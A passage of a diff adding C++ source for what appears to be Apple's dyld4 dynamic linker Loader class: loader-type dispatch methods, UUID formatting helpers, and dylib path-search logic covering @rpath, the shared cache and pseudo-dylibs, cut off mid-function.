dylib in the cache +// to point to the new dylib. But if that dylib is missing some symbol, dyld will patch other clients to point +// to BAD_ROOT_ADDRESS instead. That will cause a crash and the crash will be easy to identify in crash logs. +#define BAD_ROOT_ADDRESS 0xbad4007 + + +using dyld3::MachOAnalyzer; +using dyld3::MachOFile; +using dyld3::Platform; + +namespace dyld4 { + +Loader::InitialOptions::InitialOptions() + : inDyldCache(false) + , hasObjc(false) + , mayHavePlusLoad(false) + , roData(false) + , neverUnloaded(false) + , leaveMapped(false) + , roObjC(false) + , pre2022Binary(false) +{ +} + +Loader::InitialOptions::InitialOptions(const Loader& other) + : inDyldCache(other.dylibInDyldCache) + , hasObjc(other.hasObjC) + , mayHavePlusLoad(other.mayHavePlusLoad) + , roData(other.hasReadOnlyData) + , neverUnloaded(other.neverUnload) + , leaveMapped(other.leaveMapped) + , roObjC(other.hasReadOnlyObjC) + , pre2022Binary(other.pre2022Binary) +{ +} + +const char* Loader::path() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->path(); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->path(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->path(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +const MachOFile* Loader::mf(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->mf(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->mf(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->mf(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if SUPPORT_VM_LAYOUT +const MachOLoaded* Loader::loadAddress(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->loadAddress(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->loadAddress(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->loadAddress(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +#if SUPPORT_VM_LAYOUT +bool Loader::contains(RuntimeState& state, const void* addr, const void** segAddr, uint64_t* segSize, uint8_t* segPerms) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->contains(state, addr, segAddr, segSize, segPerms); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +bool Loader::matchesPath(const char* path) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->matchesPath(path); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->matchesPath(path); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->matchesPath(path); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if !SUPPORT_CREATING_PREMAPPEDLOADERS +FileID Loader::fileID(const RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->fileID(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->fileID(state); +} +#endif // !SUPPORT_CREATING_PREMAPPEDLOADERS + +uint32_t Loader::dependentCount() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dependentCount(); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dependentCount(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dependentCount(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +Loader* Loader::dependent(const RuntimeState& state, uint32_t depIndex, DependentKind* kind) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dependent(state, depIndex, kind); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dependent(state, depIndex, kind); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dependent(state, depIndex, kind); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +void Loader::loadDependents(Diagnostics& diag, RuntimeState& state, const LoadOptions& options) +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->loadDependents(diag, state, options); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->loadDependents(diag, state, options); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->loadDependents(diag, state, options); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::getExportsTrie(uint64_t& runtimeOffset, uint32_t& size) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->getExportsTrie(runtimeOffset, size); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->getExportsTrie(runtimeOffset, size); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->getExportsTrie(runtimeOffset, size); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::hiddenFromFlat(bool forceGlobal) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->hiddenFromFlat(forceGlobal); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->hiddenFromFlat(forceGlobal); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->hiddenFromFlat(forceGlobal); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if !SUPPORT_CREATING_PREMAPPEDLOADERS +bool Loader::representsCachedDylibIndex(uint16_t dylibIndex) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->representsCachedDylibIndex(dylibIndex); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->representsCachedDylibIndex(dylibIndex); +} + +bool Loader::overridesDylibInCache(const DylibPatch*& patchTable, uint16_t& cacheDylibOverriddenIndex) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->overridesDylibInCache(patchTable, cacheDylibOverriddenIndex); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->overridesDylibInCache(patchTable, cacheDylibOverriddenIndex); +} + +#endif // !SUPPORT_CREATING_PREMAPPEDLOADERS + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +void Loader::applyFixups(Diagnostics& diag, RuntimeState& state, DyldCacheDataConstLazyScopedWriter& dataConst, bool allowLazyBinds) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + ((PrebuiltLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + ((JustInTimeLoader*)this)->applyFixups(diag, state, dataConst, allowLazyBinds); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +void Loader::withLayout(Diagnostics &diag, RuntimeState& state, void (^callback)(const mach_o::Layout &layout)) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->withLayout(diag, state, callback); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->withLayout(diag, state, callback); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->withLayout(diag, state, callback); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +bool Loader::dyldDoesObjCFixups() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->dyldDoesObjCFixups(); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->dyldDoesObjCFixups(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->dyldDoesObjCFixups(); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +const SectionLocations* Loader::getSectionLocations() const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->getSectionLocations(); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->getSectionLocations(); +} + +#if SUPPORT_IMAGE_UNLOADING +void Loader::unmap(RuntimeState& state, bool force) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->unmap(state, force); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->unmap(state, force); +} +#endif + + +bool Loader::hasBeenFixedUp(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->hasBeenFixedUp(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->hasBeenFixedUp(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->hasBeenFixedUp(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + + +bool Loader::beginInitializers(RuntimeState& state) +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + return ((PremappedLoader*)this)->beginInitializers(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + return ((PrebuiltLoader*)this)->beginInitializers(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + return ((JustInTimeLoader*)this)->beginInitializers(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +void Loader::runInitializers(RuntimeState& state) const +{ + assert(this->magic == kMagic); +#if SUPPORT_CREATING_PREMAPPEDLOADERS + assert(this->isPremapped); + ((PremappedLoader*)this)->runInitializers(state); +#else +#if SUPPORT_CREATING_PREBUILTLOADERS + if ( this->isPrebuilt ) + ((PrebuiltLoader*)this)->runInitializers(state); + else +#endif // SUPPORT_CREATING_PREBUILTLOADERS + ((JustInTimeLoader*)this)->runInitializers(state); +#endif // SUPPORT_CREATING_PREMAPPEDLOADERS +} +#endif + +const PrebuiltLoader* Loader::LoaderRef::loader(const RuntimeState& state) const +{ + if ( this->app ) + return state.processPrebuiltLoaderSet()->atIndex(this->index); + else + return state.cachedDylibsPrebuiltLoaderSet()->atIndex(this->index); +} + +const char* Loader::leafName(const char* path) +{ + if ( const char* lastSlash = strrchr(path, '/') ) + return lastSlash + 1; + else + return path; +} + +const char* Loader::leafName() const +{ + return leafName(path()); +} + +#if SUPPORT_VM_LAYOUT +const MachOAnalyzer* Loader::analyzer(RuntimeState& state) const +{ + return (MachOAnalyzer*)loadAddress(state); +} +#endif + +bool Loader::hasMagic() const +{ + return (this->magic == kMagic); +} + +void Loader::appendHexNibble(uint8_t value, char*& p) +{ + if ( value < 10 ) + *p++ = '0' + value; + else + *p++ = 'A' + value - 10; +} + +void Loader::appendHexByte(uint8_t value, char*& p) +{ + value &= 0xFF; + appendHexNibble(value >> 4, p); + appendHexNibble(value & 0x0F, p); +} + +void Loader::uuidToStr(uuid_t uuid, char uuidStr[64]) +{ + char* p = uuidStr; + appendHexByte(uuid[0], p); + appendHexByte(uuid[1], p); + appendHexByte(uuid[2], p); + appendHexByte(uuid[3], p); + *p++ = '-'; + appendHexByte(uuid[4], p); + appendHexByte(uuid[5], p); + *p++ = '-'; + appendHexByte(uuid[6], p); + appendHexByte(uuid[7], p); + *p++ = '-'; + appendHexByte(uuid[8], p); + appendHexByte(uuid[9], p); + *p++ = '-'; + appendHexByte(uuid[10], p); + appendHexByte(uuid[11], p); + appendHexByte(uuid[12], p); + appendHexByte(uuid[13], p); + appendHexByte(uuid[14], p); + appendHexByte(uuid[15], p); + *p = '\0'; +} + +void Loader::getUuidStr(RuntimeState& state, char uuidStr[64]) const +{ + uuid_t uuid; + if ( this->mf(state)->getUuid(uuid) ) { + uuidToStr(uuid, uuidStr); + } + else { + strlcpy(uuidStr, "no uuid", 64); + } +} + +void Loader::logLoad(RuntimeState& state, const char* path) const +{ + char uuidStr[64]; + this->getUuidStr(state, uuidStr); + state.log("<%s> %s\n", uuidStr, path); +} + +#if TARGET_OS_EXCLAVEKIT +const Loader* Loader::makePremappedLoader(Diagnostics& diag, RuntimeState& state, const char* path, const LoadOptions& options, const mach_o::Layout* layout) +{ + return PremappedLoader::makePremappedLoader(diag, state, path, options, layout); +} +#endif // !TARGET_OS_EXCLAVEKIT + +#if !TARGET_OS_EXCLAVEKIT +const Loader* Loader::makeDiskLoader(Diagnostics& diag, RuntimeState& state, const char* path, const LoadOptions& options, + bool overridesDyldCache, uint32_t dylibIndex, + const mach_o::Layout* layout) +{ + // never create a new loader in RTLD_NOLOAD mode + if ( options.rtldNoLoad ) + return nullptr; + + // don't use PrebuiltLoaders for simulator because the paths will be wrong (missing SIMROOT prefix) +#if SUPPORT_CREATING_PREBUILTLOADERS + // first check for a PrebuiltLoader + const Loader* result = (Loader*)state.findPrebuiltLoader(path); + if ( result != nullptr ) + return result; +#endif // SUPPORT_CREATING_PREBUILTLOADERS + + // The dylibIndex for a catalyst root might be wrong. This can happen if the dylib is found via its macOS path (ie from a zippered dylib) + // but getLoader() found the root in the /System/iOSSupport path + // In this case, we want to rewrite the dylib index to be to the catalyst unzippered twin, not the macOS one + if ( overridesDyldCache && state.config.process.catalystRuntime ) { + uint32_t dylibInCacheIndex; + if ( state.config.dyldCache.indexOfPath(path, dylibInCacheIndex) ) + dylibIndex = dylibInCacheIndex; + } + + // try building a JustInTime Loader + return JustInTimeLoader::makeJustInTimeLoaderDisk(diag, state, path, options, overridesDyldCache, dylibIndex, layout); +} + +const Loader* Loader::makeDyldCacheLoader(Diagnostics& diag, RuntimeState& state, const char* path, const LoadOptions& options, uint32_t dylibIndex, + const mach_o::Layout* layout) +{ + // never create a new loader in RTLD_NOLOAD mode + if ( options.rtldNoLoad ) + return nullptr; + +#if SUPPORT_CREATING_PREBUILTLOADERS + // first check for a PrebuiltLoader with compatible platform + // rdar://76406035 (simulator cache paths need prefix) + const PrebuiltLoader* result = state.findPrebuiltLoader(path); + if ( result != nullptr ) { + if ( result->mf(state)->loadableIntoProcess(state.config.process.platform, path, state.config.security.internalInstall) ) { + return result; + } + } +#endif // SUPPORT_CREATING_PREBUILTLOADERS + + // try building a JustInTime Loader + return JustInTimeLoader::makeJustInTimeLoaderDyldCache(diag, state, path, options, dylibIndex, layout); +} + +const Loader* Loader::makePseudoDylibLoader(Diagnostics& diag, RuntimeState &state, const char* path, const LoadOptions& options, const PseudoDylib* pd) { + return JustInTimeLoader::makePseudoDylibLoader(diag, state, path, options, pd); +} + +static bool isFileRelativePath(const char* path) +{ + if ( path[0] == '/' ) + return false; + if ( (path[0] == '.') && (path[1] == '/') ) + return true; + if ( (path[0] == '.') && (path[1] == '.') && (path[2] == '/') ) + return true; + return (path[0] != '@'); +} + +static bool mightBeInSharedCache(const char* dylibName) { + return ( (strncmp(dylibName, "/usr/lib/", 9) == 0) + || (strncmp(dylibName, "/System/Library/", 16) == 0) + || (strncmp(dylibName, "/System/iOSSupport/usr/lib/", 27) == 0) + || (strncmp(dylibName, "/System/iOSSupport/System/Library/", 34) == 0) + || (strncmp(dylibName, "/System/DriverKit/", 18) == 0) ); +} + + +// This composes DyldProcessConfig::forEachPathVariant() with Loader::forEachResolvedAtPathVar() +// They are separate layers because DyldProcessConfig handles DYLD_ env vars and Loader handle @ paths +void Loader::forEachPath(Diagnostics& diag, RuntimeState& state, const char* loadPath, const LoadOptions& options, + void (^handler)(const char* possiblePath, ProcessConfig::PathOverrides::Type type, bool&)) +{ + __block bool stop = false; + const ProcessConfig::PathOverrides& po = state.config.pathOverrides; + // (DYLD_FALLBACK_LIBRARY_PATH should only apply to dlopen() of leaf names) + bool skipFallbacks = !options.staticLinkage && (strchr(loadPath, '/') != nullptr) && (state.config.pathOverrides.getFrameworkPartialPath(loadPath) == nullptr); + po.forEachPathVariant(loadPath, state.config.process.platform, options.requestorNeedsFallbacks, skipFallbacks, stop, + ^(const char* possibleVariantPath, ProcessConfig::PathOverrides::Type type, bool&) { + #if !TARGET_OS_EXCLAVEKIT + // relative name to dlopen() has special behavior + if ( !options.staticLinkage && (type == ProcessConfig::PathOverrides::Type::rawPath) && (loadPath[0] != '/') ) { + // if relative path, turn into implicit @rpath + if ( (loadPath[0] != '@') ) { + char implicitRPath[PATH_MAX]; + strlcpy(implicitRPath, "@rpath/", sizeof(implicitRPath)); + strlcat(implicitRPath, possibleVariantPath, sizeof(implicitRPath)); + Loader::forEachResolvedAtPathVar(state, implicitRPath, options, ProcessConfig::PathOverrides::Type::implictRpathExpansion, stop, handler); + if ( stop ) + return; + // always look in /usr/lib for leaf names + char implicitPath[PATH_MAX]; + strlcpy(implicitPath, "/usr/lib/", sizeof(implicitRPath)); + strlcat(implicitPath, loadPath, sizeof(implicitPath)); + handler(implicitPath, ProcessConfig::PathOverrides::Type::standardFallback, stop); + if ( stop ) + return; + // only try cwd relative if afmi allows + if ( state.config.security.allowAtPaths ) { + handler(loadPath, type, stop); + } + // don't try anything else for dlopen of non-absolute paths + return; + } + } + // expand @ paths + Loader::forEachResolvedAtPathVar(state, possibleVariantPath, options, type, stop, handler); + #else + handler(possibleVariantPath, type, stop); + #endif // !TARGET_OS_EXCLAVEKIT + }); +} +#endif // !TARGET_OS_EXCLAVEKIT + +// +// Use PathOverrides class to walk possible paths, for each, look on disk, then in cache. +// Special case customer caches to look in cache first, to avoid stat() when result will be disgarded. +// For dylibs loaded from disk, we need to know if they override something in the cache in order to patch it in. +// It is considered an override if the initial path or path found is in the dyld cache +// +const Loader* Loader::getLoader(Diagnostics& diag, RuntimeState& state, const char* loadPath, const LoadOptions& options) +{ +#if TARGET_OS_EXCLAVEKIT + __block const Loader* result = nullptr; + // check if this path already in use by a Loader + for ( const Loader* ldr : state.loaded ) { + if ( !ldr->matchesPath(loadPath) ) + continue; + result = ldr; + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-path: \"%s\"\n", loadPath); + } + + if ( result == nullptr ) + result = makePremappedLoader(diag, state, loadPath, options, nullptr); + + if ( (result == nullptr) && options.canBeMissing ) { + diag.clearError(); + } + + return result; +#else + __block const Loader* result = nullptr; + const DyldSharedCache* cache = state.config.dyldCache.addr; + const bool customerCache = (cache != nullptr) && !state.config.dyldCache.development; + if ( state.config.log.searching ) + state.log("find path \"%s\"\n", loadPath); + + const bool loadPathIsRPath = (::strncmp(loadPath, "@rpath/", 7) == 0); + const bool loadPathIsFileRelativePath = isFileRelativePath(loadPath); + + // for @rpath paths, first check if already loaded as rpath + if ( loadPathIsRPath ) { + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(loadPath) ) { + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-rpath: %s\n", ldr->path()); + return ldr; + } + } + } + else if ( !options.staticLinkage && (loadPath[0] != '@') && (loadPath[0] != '/') && (strchr(loadPath, '/') == nullptr) ) { + // handle dlopen("xxx") to mean "@rpath/xxx" when it is already loaded + char implicitRPath[strlen(loadPath)+8]; + strlcpy(implicitRPath, "@rpath/", sizeof(implicitRPath)); + strlcat(implicitRPath, loadPath, sizeof(implicitRPath)); + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(implicitRPath) ) { + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-rpath: %s\n", ldr->path()); + return ldr; + } + } + } + + // canonicalize shared cache paths + if ( const char* canonicalPathInCache = state.config.canonicalDylibPathInCache(loadPath) ) { + if ( strcmp(canonicalPathInCache, loadPath) != 0 ) { + loadPath = canonicalPathInCache; + if ( state.config.log.searching ) + state.log(" switch to canonical cache path: %s\n", loadPath); + } + } + + // get info about original path + __block uint32_t dylibInCacheIndex; + const bool originalPathIsInDyldCache = state.config.dyldCache.indexOfPath(loadPath, dylibInCacheIndex); + +#if BUILDING_DYLD && TARGET_OS_OSX + // On macOS, we need to support unzippered twins, which look like roots. So if the original path is in the cache, it may + // still be overridable by an unzippered twin which is also in the cache + const bool originalPathIsOverridableInDyldCache = originalPathIsInDyldCache; +#else + const bool originalPathIsOverridableInDyldCache = originalPathIsInDyldCache && state.config.dyldCache.isOverridablePath(loadPath); +#endif + + // search all locations + Loader::forEachPath(diag, state, loadPath, options, + ^(const char* possiblePath, ProcessConfig::PathOverrides::Type type, bool& stop) { + // On customer dyld caches, if loaded a path in cache, don't look for overrides + if ( customerCache && originalPathIsInDyldCache && !originalPathIsOverridableInDyldCache && (possiblePath != loadPath) ) + return; + if ( state.config.log.searching ) + state.log(" possible path(%s): \"%s\"\n", ProcessConfig::PathOverrides::typeName(type), possiblePath); + + // check if this path already in use by a Loader + for ( const Loader* ldr : state.loaded ) { + if ( ldr->matchesPath(possiblePath) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-path: \"%s\"\n", possiblePath); + return; + } + } + + // don't allow file system relative paths in hardened programs + // (type == ProcessConfig::PathOverrides::Type::implictRpathExpansion) + if ( !state.config.security.allowEnvVarsPath && isFileRelativePath(possiblePath) ) { + if ( diag.noError() ) + diag.error("tried: '%s' (relative path not allowed in hardened program)", possiblePath); + else + diag.appendError(", '%s' (relative path not allowed in hardened program)", possiblePath); + return; + } + + // check dyld cache trie to see if this is an alias to a cached dylib + uint32_t possibleCacheIndex; + if ( state.config.dyldCache.indexOfPath(possiblePath, possibleCacheIndex) ) { + for ( const Loader* ldr : state.loaded ) { + if ( ldr->representsCachedDylibIndex(possibleCacheIndex) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-dylib-index: \"%s\" -> %s\n", possiblePath, ldr->path()); + return; + } + } + } + + // RTLD_NOLOAD used and this possible path not already in use, so skip to next + if ( options.rtldNoLoad ) { + return; + } + + // Check for PseduoDylibs + if (!state.pseudoDylibs.empty()) { + // FIXME: Should all of this be in its own function? + if ( state.config.log.searching ) + state.log("searching %lu pseudo-dylibs:\n", state.pseudoDylibs.size()); + for (auto &pd : state.pseudoDylibs) { + if (strcmp(pd->getIdentifier(), possiblePath) == 0) { + if ( state.config.log.searching ) + state.log(" found: pseduo-dylib: \"%s\"\n", possiblePath); + Diagnostics possiblePathDiag; + result = makePseudoDylibLoader(possiblePathDiag, state, possiblePath, options, &*pd); + if ( possiblePathDiag.hasError() ) { + // Report error if pseudo-dylib failed to load. + if ( diag.noError() ) + diag.error("tried: '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + else + diag.appendError(", '%s' (%s)", possiblePath, possiblePathDiag.errorMessageCStr()); + + if ( state.config.log.searching ) + state.log(" found: pseudo-dylib-error: \"%s\" => \"%s\"\n", possiblePath, possiblePathDiag.errorMessageCStr()); + } + if (result) { + diag.clearError(); + stop = true; + return; + } + } + } + if ( state.config.log.searching && !result) + state.log("no pseudo-dylibs matched\n"); + } else if ( state.config.log.searching ) + state.log("no pseudo-dylibs to search\n"); + + // see if this path is on disk or in dyld cache + int possiblePathOnDiskErrNo = 0; + bool possiblePathHasFileOnDisk = false; + bool possiblePathIsInDyldCache = false; + bool possiblePathOverridesCache = false; + FileID possiblePathFileID = FileID::none(); + if ( customerCache ) { + // for customer cache, check cache first and only stat() if overridable + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + possiblePathIsInDyldCache = state.config.dyldCache.indexOfPath(possiblePath, dylibInCacheIndex); + if ( possiblePathIsInDyldCache ) { + if ( state.config.dyldCache.isOverridablePath(possiblePath) ) { + // see if there is a root installed that overrides one of few overridable dylibs in the cache + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + possiblePathOverridesCache = possiblePathHasFileOnDisk; + } + } + else { + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + possiblePathOverridesCache = possiblePathHasFileOnDisk && originalPathIsOverridableInDyldCache; + } + } + else { + // for dev caches, always stat() and check cache + possiblePathHasFileOnDisk = state.config.fileExists(possiblePath, &possiblePathFileID, &possiblePathOnDiskErrNo); + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + possiblePathIsInDyldCache = state.config.dyldCache.indexOfPath(possiblePath, dylibInCacheIndex); + possiblePathOverridesCache = possiblePathHasFileOnDisk && (originalPathIsInDyldCache || possiblePathIsInDyldCache); + } + + // see if this possible path was already loaded via a symlink or hardlink by checking inode + if ( possiblePathHasFileOnDisk && possiblePathFileID.valid() ) { + for ( const Loader* ldr : state.loaded ) { + FileID ldrFileID = ldr->fileID(state); + if ( ldrFileID.valid() && (possiblePathFileID == ldrFileID) ) { + result = ldr; + stop = true; + diag.clearError(); // found dylib, so clear any errors from previous paths tried + if ( state.config.log.searching ) + state.log(" found: already-loaded-by-inode-mtime: \"%s\"\n", ldr->path()); + return; + } + } + } + +#if TARGET_OS_SIMULATOR + // rdar://76406035 (load simulator dylibs from cache) + if ( (state.config.dyldCache.addr != nullptr) && state.config.dyldCache.addr->header.dylibsExpectedOnDisk ) { + if ( const char* simRoot = state.config.pathOverrides.simRootPath() ) { + size_t simRootLen = strlen(simRoot); + // compare inode/mtime of dylib now vs when cache was built + const char* possiblePathInSimDyldCache = nullptr; + if ( strncmp(possiblePath, simRoot, simRootLen) == 0 ) { + // looks like a dylib in the sim Runtime root, see if partial path is in the dyld cache + possiblePathInSimDyldCache = &possiblePath[simRootLen]; + } + else if ( strncmp(possiblePath, "/usr/lib/system/", 16) == 0 ) { + // could be one of the magic host dylibs that got incorporated into the dyld cache + possiblePathInSimDyldCache = possiblePath; + } + if ( possiblePathInSimDyldCache != nullptr ) { + if ( state.config.dyldCache.indexOfPath(possiblePathInSimDyldCache, dylibInCacheIndex) ) { + uint64_t expectedMTime; + uint64_t expectedInode; + state.config.dyldCache.addr->getIndexedImageEntry(dylibInCacheIndex, expectedMTime, expectedInode); + FileID expectedID(expectedInode, state.config.process.dyldSimFSID, expectedMTime, true); + if ( possiblePathFileID == expectedID ) { + // inode/mtime matches when sim dyld cache was built, so use dylib from dyld cache and ignore file on disk + possiblePathHasFileOnDisk = false; + possiblePathIsInDyldCache = true; + } + } + } + } + } +#endif + // if possiblePath not a file and not in dyld cache, skip to next possible path + if ( !possiblePathHasFileOnDisk && !possiblePathIsInDyldCache ) { + if ( options.pathNotFoundHandler && !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) ) + options.pathNotFoundHandler(possiblePath); + // append each path tried to diag + if ( diag.noError() ) + diag.error("tried: "); + else + diag.appendError(", "); + const char* sharedCacheMsg = ""; + if ( !ProcessConfig::PathOverrides::isOnDiskOnlyType(type) && mightBeInSharedCache(possiblePath) ) + sharedCacheMsg = (state.config.dyldCache.addr != nullptr) ? ", not in dyld cache" : ", no dyld cache"; + if ( possiblePathOnDiskErrNo == ENOENT ) + diag.appendError("'%s' (no such file%s)", possiblePath, sharedCacheMsg); + else if ( possiblePathOnDiskErrNo == ENOTAFILE_NP ) + diag.appendError("'%s' (not a file%s)", possiblePath, sharedCacheMsg); + else + diag.appendError("'%s' (errno=%d%s)", possiblePath, possiblePathOnDiskErrNo, sharedCacheMsg); + return; + } + + // try to build Loader from possiblePath + Diagnostics possiblePathDiag; + if ( possiblePathHasFileOnDisk ) { + if ( possiblePathOverridesCache ) { + // use dylib on disk to override dyld cache + 